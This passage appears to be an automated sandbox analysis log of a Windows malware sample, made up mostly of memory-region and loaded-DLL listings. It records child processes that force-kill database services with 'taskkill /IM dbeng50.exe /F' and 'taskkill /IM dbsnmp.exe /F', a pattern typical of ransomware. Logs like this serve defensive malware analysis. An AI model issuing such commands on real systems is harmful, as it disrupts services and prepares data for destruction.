0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 293 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 294 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 295 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 296 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 297 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 298 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 299 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 300 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 301 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 302 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 303 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 304 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 305 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 306 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 307 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 308 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 309 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 310 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 311 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 312 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 313 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 314 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 315 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 316 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 317 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 318 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 319 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 320 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 321 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 322 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 323 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 8 os_tid = 0x98c Thread: id = 20 os_tid = 0xa1c Thread: id = 26 os_tid = 0xa54 Thread: id = 77 os_tid = 0xaa0 Thread: id = 78 os_tid = 0xaa4 Process: id = "4" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7a55c000" os_pid = "0x9a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM dbeng50.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 248 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 249 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 250 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 251 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 252 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 253 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 254 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 255 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 256 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 257 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 258 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 259 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 260 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 261 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 262 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 413 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 414 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 415 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 416 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 417 start_va = 0x70000 end_va = 0x73fff entry_point = 0x70000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 418 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 419 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 420 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 421 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 422 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 423 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 424 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 425 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 426 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 427 start_va = 0x720000 end_va = 0x1b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 428 start_va = 0x1ba0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 429 start_va = 0x1c20000 end_va = 0x1cdffff entry_point = 0x1c20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 430 start_va = 0x1e30000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 431 start_va = 0x1f60000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 432 start_va = 0x2030000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 433 start_va = 0x20b0000 end_va = 0x237efff entry_point = 0x20b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 434 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 435 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 436 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 437 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 438 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 439 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 440 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 441 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 442 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 443 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 444 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 445 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 446 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 447 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 448 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 449 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 450 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 451 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 452 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 453 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 454 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 455 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 456 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 457 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 458 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 459 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 460 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 461 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 462 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 463 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 464 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 465 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 466 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 467 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 468 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 469 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 470 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 471 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 487 start_va = 0x1d10000 end_va = 0x1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 488 start_va = 0x2390000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 489 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 490 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 491 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 833 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 834 start_va = 0x7fef7360000 end_va = 0x7fef7441fff entry_point = 0x7fef7360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Thread: id = 10 os_tid = 0x9a8 Thread: id = 19 os_tid = 0xa18 Thread: id = 25 os_tid = 0xa50 Thread: id = 71 os_tid = 0xa70 Thread: id = 72 os_tid = 0xa74 Process: id = "5" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7a47c000" os_pid = "0x9c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM dbsnmp.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 263 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 264 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 265 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 266 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 267 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 268 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 269 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 270 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 271 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 272 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 273 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 274 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 275 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 276 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 277 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 835 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 836 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 837 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 838 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 839 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 840 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 841 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 842 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 843 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 844 start_va = 0x290000 end_va = 0x34ffff entry_point = 0x290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 845 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 846 start_va = 0x360000 end_va = 0x360fff entry_point = 